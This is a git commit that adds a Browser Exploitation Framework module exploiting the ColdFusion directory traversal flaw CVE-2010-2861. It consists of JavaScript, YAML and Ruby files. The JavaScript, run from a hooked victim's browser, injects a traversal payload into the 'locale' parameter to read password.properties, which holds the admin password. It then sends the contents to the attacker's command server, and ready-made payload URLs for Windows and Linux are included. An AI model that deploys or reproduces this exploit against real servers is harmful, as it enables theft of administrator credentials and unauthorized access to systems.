(Fixes issue 111) Added ColdFusion exploit (CVE-2010-2861)

git-svn-id: https://beef.googlecode.com/svn/trunk@980 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2011-05-19 17:49:33 +00:00
parent fef2b4fbe8
commit ff39c12909
3 changed files with 85 additions and 0 deletions
--- a/modules/network/coldfusion_dir_traversal_exploit/command.js
+++ b/modules/network/coldfusion_dir_traversal_exploit/command.js
@@ -0,0 +1,32 @@
+/**
+ * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
+ * Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
+ * By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
+ * the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
+ *
+ * On a default win installation, the following vector works great:
+ * http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
+ * demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
+ */
+beef.execute(function() {
+   fileToRetrieve = "<%= @fileToRetrieve %>";
+   targetOS = "<%= @os_combobox %>";
+   cf_version = "<%= @cf_version %>";
+   var uri = null;
+   if(targetOS == "Windows"){
+       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
+   }else{
+       uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
+   }
+
+	beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
+         if(response.status_code == "success"){
+            titleStart = response.response_body.indexOf("<title>");
+            titleEnd = response.response_body.indexOf("</title>");
+            exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
+            beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
+         }else{
+             beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
+         }
+    });
+});
--- a/modules/network/coldfusion_dir_traversal_exploit/config.yaml
+++ b/modules/network/coldfusion_dir_traversal_exploit/config.yaml
@@ -0,0 +1,10 @@
+beef:
+    module:
+        coldfusion_dir_traversal_exploit:
+            enable: true
+            category: "Network"
+            name: "ColdFusion Directory Traversal Exploit"
+            description: "ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861)"
+            authors: ["antisnatchor"]
+            target:
+                working: ["ALL"]
--- a/modules/network/coldfusion_dir_traversal_exploit/module.rb
+++ b/modules/network/coldfusion_dir_traversal_exploit/module.rb
@@ -0,0 +1,43 @@
+class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
+
+  #
+  # Defines and set up the command module.
+  #
+  def initialize
+    super({
+      'Name' => 'ColdFusion Directory Traversal Exploit',
+      'Description' => 'ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861). </br> For SOP limitations, the victim must be hooked to BeEF through a page served by the ColdFusion server.',
+      'Category' => 'Network',
+      'Author' => 'antisnatchor',
+      'Data' => [
+         # for Same Origin Policy limitations, right now we're only handling local ColdFusion servers
+         # (victim hooked on page malware.com/ciccio/pasticcio and CF server reachable at malware.com/CFIDE )
+         #{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
+         #{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
+        {'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file  (in CF /lib dir)', 'value' => 'password.properties'},
+        { 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
+          'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
+          'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
+        },
+        { 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
+          'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
+          'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
+        }
+
+      ],
+      'File' => __FILE__
+    })
+
+    set_target({
+      'verified_status' =>  VERIFIED_WORKING,
+      'browser_name' =>     ALL
+    })
+
+    use_template!
+  end
+
+  def callback
+    save({'result' => @datastore['result']})
+  end
+
+end